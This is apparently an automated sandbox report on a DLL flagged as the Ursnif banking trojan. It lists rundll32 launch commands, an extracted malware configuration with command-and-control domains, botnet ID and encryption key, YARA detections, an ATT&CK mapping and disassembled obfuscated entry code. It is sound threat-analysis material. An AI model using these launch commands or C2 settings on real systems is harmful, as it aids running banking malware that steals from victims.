Play interactive tour

Edit tour

Analysis Report gg.gif.dll

Overview

General Information

Sample Name:	gg.gif.dll
Analysis ID:	382563
MD5:	716649589f77b4c078b4fd89cfab2420
SHA1:	841dde1545bdfee1be219de7d905d3d2db8ca5bb
SHA256:	9f644696f60e80e65ba49dad63c828ba7eca8a3dd6a214bc5321cb7d3ed2c8e6
Tags:	dllGGGoziIFSBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Machine Learning detection for sample

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

PE file contains sections with non-standard names

Program does not show much activity (idle)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5408 cmdline: loaddll32.exe 'C:\Users\user\Desktop\gg.gif.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 5504 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5552 cmdline: rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5572 cmdline: rundll32.exe C:\Users\user\Desktop\gg.gif.dll,DllServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

[[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.287291124.0000000000F20000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000002.257345092.0000000000F10000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000002.240096521.0000000002290000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.2.rundll32.exe.f10000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.2290000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.f20000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.2.rundll32.exe.f20000.2.raw.unpack

Malware Configuration Extractor: Ursnif [[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]

Multi AV Scanner detection for submitted file

Show sources

Source: gg.gif.dll

ReversingLabs: Detection: 41%

Machine Learning detection for sample

Show sources

Source: gg.gif.dll

Joe Sandbox ML: detected

Source: gg.gif.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.287291124.0000000000F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.257345092.0000000000F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.240096521.0000000002290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.rundll32.exe.f10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2290000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.f20000.2.raw.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.287291124.0000000000F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.257345092.0000000000F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.240096521.0000000002290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.rundll32.exe.f10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2290000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.f20000.2.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16	0_2_02275F16
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275A25	0_2_02275A25
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0227150C	0_2_0227150C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02273A14	0_2_02273A14
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02271B1E	0_2_02271B1E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02271967	0_2_02271967
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02272566	0_2_02272566
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275262	0_2_02275262
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02272A69	0_2_02272A69
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275378	0_2_02275378
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02272FAF	0_2_02272FAF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02273FAB	0_2_02273FAB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_022731B3	0_2_022731B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_022792B2	0_2_022792B2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_022788BA	0_2_022788BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_022713C5	0_2_022713C5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_022727D4	0_2_022727D4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02271CD0	0_2_02271CD0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_022743D8	0_2_022743D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE5F16	2_2_00EE5F16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE13C5	2_2_00EE13C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE43D8	2_2_00EE43D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE27D4	2_2_00EE27D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE1CD0	2_2_00EE1CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE2FAF	2_2_00EE2FAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE3FAB	2_2_00EE3FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE88BA	2_2_00EE88BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE92B2	2_2_00EE92B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE31B3	2_2_00EE31B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE2A69	2_2_00EE2A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE2566	2_2_00EE2566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE1967	2_2_00EE1967
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE5262	2_2_00EE5262
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE5378	2_2_00EE5378
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE5A25	2_2_00EE5A25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE150C	2_2_00EE150C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE1B1E	2_2_00EE1B1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE3A14	2_2_00EE3A14

Source: gg.gif.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal68.troj.winDLL@7/0@0/0

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gg.gif.dll,DllServer

Source: gg.gif.dll

ReversingLabs: Detection: 41%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\gg.gif.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gg.gif.dll,DllServer
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\gg.gif.dll,DllServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1	Jump to behavior

Source: gg.gif.dll

Static PE information: section name: .code

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx	0_2_02275F7B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	0_2_02275F94
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	0_2_02275FDD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	0_2_0227604B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	0_2_02276124
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push 00000000h; mov dword ptr [esp], edi	0_2_0227614F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push 00000000h; mov dword ptr [esp], edx	0_2_0227625E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	0_2_022762B5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	0_2_02276343
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	0_2_0227635D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push 00000000h; mov dword ptr [esp], ebp	0_2_02276368
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	0_2_02276385
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push 00000000h; mov dword ptr [esp], edx	0_2_022763B4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	0_2_02276483
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	0_2_022764F2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax	0_2_022764FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	0_2_0227650A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push 00000000h; mov dword ptr [esp], edi	0_2_02276567
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push 00000000h; mov dword ptr [esp], edi	0_2_022765A9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push 00000000h; mov dword ptr [esp], eax	0_2_02276610
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	0_2_02276685
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx	0_2_022766C2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	0_2_022766E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push 00000000h; mov dword ptr [esp], edi	0_2_02276781
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push 00000000h; mov dword ptr [esp], edx	0_2_022767B6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	0_2_0227684C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	0_2_02276858
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-10h]; mov dword ptr [esp], edx	0_2_02276926
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax	0_2_02276945
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax	0_2_02276951
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02275F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx	0_2_022769D6

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.287291124.0000000000F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.257345092.0000000000F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.240096521.0000000002290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.rundll32.exe.f10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2290000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.f20000.2.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02272A69 xor edi, dword ptr fs:[00000030h]		0_2_02272A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00EE2A69 xor edi, dword ptr fs:[00000030h]		2_2_00EE2A69

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.287291124.0000000000F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.257345092.0000000000F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.240096521.0000000002290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.rundll32.exe.f10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2290000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.f20000.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000002.287291124.0000000000F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.257345092.0000000000F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.240096521.0000000002290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.rundll32.exe.f10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2290000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.f20000.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection11	Rundll321	OS Credential Dumping	Virtualization/Sandbox Evasion1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	System Information Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
gg.gif.dll	42%	ReversingLabs	Win32.Trojan.Wacatac
gg.gif.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	382563
Start date:	06.04.2021
Start time:	09:57:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	gg.gif.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.winDLL@7/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 60.6% (good quality ratio 52.8%) Quality average: 64.4% Quality standard deviation: 33.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 4 Number of non-executed functions: 18
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, SgrmBroker.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

Time	Type	Description
09:58:34	API Interceptor	1x Sleep call for process: loaddll32.exe modified
09:58:56	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.128077191391246
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gg.gif.dll
File size:	118156
MD5:	716649589f77b4c078b4fd89cfab2420
SHA1:	841dde1545bdfee1be219de7d905d3d2db8ca5bb
SHA256:	9f644696f60e80e65ba49dad63c828ba7eca8a3dd6a214bc5321cb7d3ed2c8e6
SHA512:	dca238736a5a12e0ce89b1f257ab8cffeec5ab3133d5370c9482d56160e89caaa072da463cf19f99b7dd9d90aea5949911c29fcedfa28e7d1914b9127f11e7f8
SSDEEP:	1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e..)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko.............................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10006f6b
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x6066E9D0 [Fri Apr 2 09:54:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3f728412058b62c418b1091768b74d7b

Entrypoint Preview

Instruction
push ebx
push esi
and dword ptr [esp], 00000000h
or dword ptr [esp], ebp
mov ebp, esp
add esp, FFFFFFF8h
push esp
mov dword ptr [esp], FFFF0000h
call 00007F37F88B78A1h
push eax
add dword ptr [esp], 00000247h
sub dword ptr [esp], eax
push esi
mov dword ptr [esp], 00001567h
call 00007F37F88B6817h
push eax
or dword ptr [esp], eax
pop eax
jne 00007F37F88BBB1Bh
pushad
push 00000000h
mov dword ptr [esp], esi
xor esi, esi
xor esi, dword ptr [ebx+0041C627h]
mov eax, esi
pop esi
push ebx
add dword ptr [esp], 40h
sub dword ptr [esp], ebx
push ebp
add dword ptr [esp], 00001000h
sub dword ptr [esp], ebp
mov dword ptr [ebp-04h], 00000000h
push dword ptr [ebp-04h]
xor dword ptr [esp], eax
push 00000000h
call dword ptr [ebx+0041F05Ch]
mov dword ptr [ebp-04h], ecx
xor ecx, dword ptr [ebp-04h]
or ecx, eax
and edi, 00000000h
xor edi, ecx
mov ecx, dword ptr [ebp-04h]
push edi
pop dword ptr [ebp-04h]
push dword ptr [ebp-04h]
pop dword ptr [ebx+0041CAEDh]
cmp ebx, 00000000h
jbe 00007F37F88BBB0Ch
push 00000000h
add dword ptr [esp], edx
push dword ptr [ebx+0041C166h]
pop edx
add edx, ebx
mov dword ptr [ebx+0041C166h], edx
pop edx
push 00000000h
add dword ptr [esp], edx
push dword ptr [ebx+0041CECAh]
pop edx
add edx, ebx
mov dword ptr [ebx+0041CECAh], edx
pop edx
push ebp
and ebp, 00000000h
or ebp, dword ptr [ebx+0041C166h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1a000	0x64	.data
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f0fc	0x118	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0xfc	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x185f2	0x18600	False	0.670042067308	data	6.53345039933	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1a000	0x64	0x200	False	0.16796875	data	1.0662581269	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x1000	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x20b3	0x2200	False	0.359834558824	data	2.96025706595	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data	0x1f000	0x7b2	0x800	False	0.45703125	data	4.70767794561	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
user32.dll	GetActiveWindow, SetWindowsHookExA, GetLayeredWindowAttributes
kernel32.dll	GetProcAddress, LoadLibraryA, VirtualProtect, VirtualAlloc, lstrlenA, lstrcatA, lstrcmpA, GetEnvironmentVariableW
ole32.dll	OleInitialize, OleQueryCreateFromData, IIDFromString, CLIPFORMAT_UserUnmarshal, OleCreateEmbeddingHelper, HDC_UserSize
msimg32.dll	AlphaBlend, TransparentBlt
comdlg32.dll	PageSetupDlgA, PrintDlgA
oledlg.dll	OleUICanConvertOrActivateAs, OleUIChangeSourceW, OleUIConvertA
comctl32.dll	CreateStatusWindow, LBItemFromPt, DPA_Create, FlatSB_ShowScrollBar, ImageList_GetFlags
oleacc.dll	IID_IAccessible, LresultFromObject
version.dll	VerFindFileW, VerInstallFileA, VerQueryValueA, VerQueryValueW
